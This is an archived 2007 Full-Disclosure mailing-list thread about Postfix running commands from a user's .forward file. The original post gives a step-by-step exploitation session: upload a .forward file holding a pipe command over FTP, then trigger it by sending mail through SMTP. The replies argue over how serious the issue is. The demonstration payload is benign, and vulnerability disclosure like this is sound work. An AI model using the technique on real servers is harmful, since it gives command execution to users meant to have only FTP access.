[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [Full-disclosure] Small Design Bug in Postfix - REMOTE
- To: "Fredrick Diggle" <fdiggle@xxxxxxxxx>
- Subject: Re: [Full-disclosure] Small Design Bug in Postfix - REMOTE
- From: "Adam N" <interfect@xxxxxxxxx>
- Date: Fri, 14 Dec 2007 13:52:33 -0600
No, the idea is that you are a user with no login access, only FTP.
By doing this, you get shell access (with sane privileges, thankfully) when
you're supposed to only have FTP.
On Dec 13, 2007 2:34 PM, Fredrick Diggle <fdiggle@xxxxxxxxx> wrote:
> You have write perms on a users home directory and this was the best way
> you could come up with to execute commands? Please send me details on your
> recipe for boiled water. Be sure to gzip it though as I imagine it is
> several pages long.
>
> YAY!
>
>
> On Dec 13, 2007 2:18 PM, kcope <kingcope@xxxxxxx> wrote:
>
> > Small Design Bug in Postfix - REMOTE
> >
> > There's a small issue on how Postfix forwards mails.
> > A user can have a .forward file in her home directory.
> > Inside this file she can specifiy an alternative recipient
> > or use aliasing to execute commands when mail is received.
> > >From the manpage ALIASES(5)
> > "aliases - Postfix local alias database format"
> >
> > |command
> > Mail is piped into command. Commands that contain
> > special characters, such as whitespace, should be
> > enclosed between double quotes. See local(8) for
> > details of delivery to command.
> >
> > When the command fails, a limited amount of command
> > output is mailed back to the sender. The file
> > /usr/include/sysexits.h defines the expected exit
> > status codes. For example, use "|exit 67" to simu-
> > late a "user unknown" error, and "|exit 0" to
> > implement an expensive black hole.
> >
> > This is fine since postfix properly drops privileges before
> > executing the command.
> > The Problem with executing commands via .forward files is that
> > if someone manages to place a file into ones home directory and
> > just sends a file to the mailserver she can execute commands
> > even when she's not supposed to or does not have the privileges.
> >
> > Here is an example exploitation session, the user 'rootkey'
> > only has ftp access with write permissions and no other privileges than
> > that.
> >
> > Login to FTP server
> > >telnet box 21
> > >USER rootkey
> > >PASS rootkey123
> > <logged in
> >
> > Put .forward file with following contents into the home directory of
> > user 'rootkey'.
> >
> > ---snip---
> > |touch /tmp/XXX
> > ---snip---
> >
> > >put .forward
> >
> > Now send an email to user rootkey.
> >
> > >telnet box 25
> > >mail from: rootkey
> > >rcpt to: rootkey
> > >data
> > >.
> >
> > RESULT:
> >
> > kcope@box:~$ ls /tmp/testXXX
> > /tmp/testXXX
> >
> >
> > signed,
> >
> > - -kcope/2007
> >
> > --
> > GMX FreeMail: 1 GB Postfach, 5 E-Mail-Adressen, 10 Free SMS.
> > Alle Infos und kostenlose Anmeldung: http://www.gmx.net/de/go/freemail
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/